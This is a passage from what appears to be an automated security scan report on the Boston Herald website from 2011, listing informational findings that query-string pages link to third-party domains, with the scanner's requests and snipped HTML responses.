<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.268. http://www.bostonherald.com/entertainment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/entertainment/?srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg
http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/cheap_thrills_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gigs_around_town_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/entertainment
http://feeds.feedburner.com/bostonherald/entertainment/
http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/
http://feeds.feedburner.com/bostonherald/entertainment/books/
http://feeds.feedburner.com/bostonherald/entertainment/fashion/
http://feeds.feedburner.com/bostonherald/entertainment/food_dining/
http://feeds.feedburner.com/bostonherald/entertainment/health/
http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/
http://feeds.feedburner.com/bostonherald/entertainment/movies/
http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/
http://feeds.feedburner.com/bostonherald/entertainment/music/
http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/
http://feeds.feedburner.com/bostonherald/entertainment/television/
http://feeds.feedburner.com/bostonherald/entertainment/travel/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110126/stp/4149d9_eyes_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/ff0551_jlalanne012611.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/39b0d8_garden_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/964bf5_rope_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110128/c1e423_ltpSteam012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/0c3b6e_Zenith_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/31c0bc_ltpWatch012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/bb4051_Banditas_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/bdc508_Rite_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/cccb20_nberkus012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://q1digital.checkm8.com/adam/cm8adam_1_call.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.feedburner.com/fb/a/feed101
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.local.com/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.twitter.com/
http://www.uclick.com/client/boh/sudoc/

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   

   <link rel="alternate" title="Entertainment - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">
<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
<a href="/entertainment/lifestyle/view.bg?articleid=1312514"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/c1e423_ltpSteam012811.jpg"></a>
...[SNIP]...
<div style="font-size: 10px; color: #999; margin-top: 6px;">
           Powered by <a href="http://www.local.com" style="text-decoration: none;">Local.com</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

17.269. http://www.bostonherald.com/entertainment/movies/reviews/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/entertainment/movies/reviews/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Fmovies%2Freviews%2Fview%2F20110128killermoves_statham_fine-tunes_mechanic_mayhem%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/james_verniere.gif?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110125/stp/147abf_stath_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110128/8345b6_Statham_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/toppicks_bostonherald_ent.html
http://widgets.mobilelocalnews.com/?uid=42b39fdb198522d2bfc6b1f64cd98365
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /entertainment/movies/reviews/view.bg?articleid=1312518&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:07:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45676

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2Fmovies%2Freviews%2Fview%2F20110128killermoves_statham_fine-tunes_mechanic_mayhem%2Fsrvc%3Dhome%26position%3Dalso&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Jason Statham fine-tunes ‘Mechanic’ mayhem');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/entertainment/movies/reviews/view.bg?articleid=1312518&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(2) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more..." /></div>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/entertainment/movies/general/view/20110125action_star_statham_gets_his_fix_in_mechanic_remake/"><img src="http://multimedia.heraldinteractive.com/images/20110125/stp/147abf_stath_01252011.jpg" alt="Action star Jason Statham gets his fix in ‘Mechanic’ remake" /></a>
...[SNIP]...

<iframe style="position:relative; margin-bottom: 16px;" src="http://widget.newsinc.com/toppicks_bostonherald_ent.html" frameborder="0" scrolling="no" width="300" height="225"></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.270. http://www.bostonherald.com/galleries/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/galleries/index.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/galleries/index.php?gallery_id=10

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234
http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://multimedia.heraldinteractive.com/images/galleries/Sports_01282011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01012011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01022011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01052011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01062011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01072011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01092011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01202011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01232011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01262011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01282011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12052010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12082010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12112010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12122010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12172010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12192010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12242010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12252010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12262010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_12312010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec072010_A068.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Dec142010_A060.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan142011_A076.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/bh_Jan182011_A064.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports01082010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports01152011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports12092010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports12202010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports20101218.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports20110116.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01042011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01102011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01112011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01122011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01132011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01172011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01192011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01212011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01242011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01252011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_01272011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_02032011.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12062010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12102010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12152010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12162010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12212010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12222010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12232010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12272010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12282010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12292010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/sports_12302010.jpg
http://multimedia.heraldinteractive.com/images/galleries/stp/swports12132010.jpg

Request

GET /galleries/index.php?gallery_id=10 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 21464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<title>Boston Herald Sports Cov
...[SNIP]...
<meta name="SUBSECTION" content="Multimedia Center" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/sections_beta.css" media="all" />
<link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/version5.0/multimedia_beta.css?nocache=1234" media="all" />

<style type="text/css">
...[SNIP]...
<a id="galleryHeaderLink" href="#"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<a href="?gallery_id=10&p=0" ><img class="galleryThumb galleryThumbSelected" src="http://multimedia.heraldinteractive.com/images/galleries/stp/Sports_01282011.jpg" alt="Photo" /></a>
...[SNIP]...
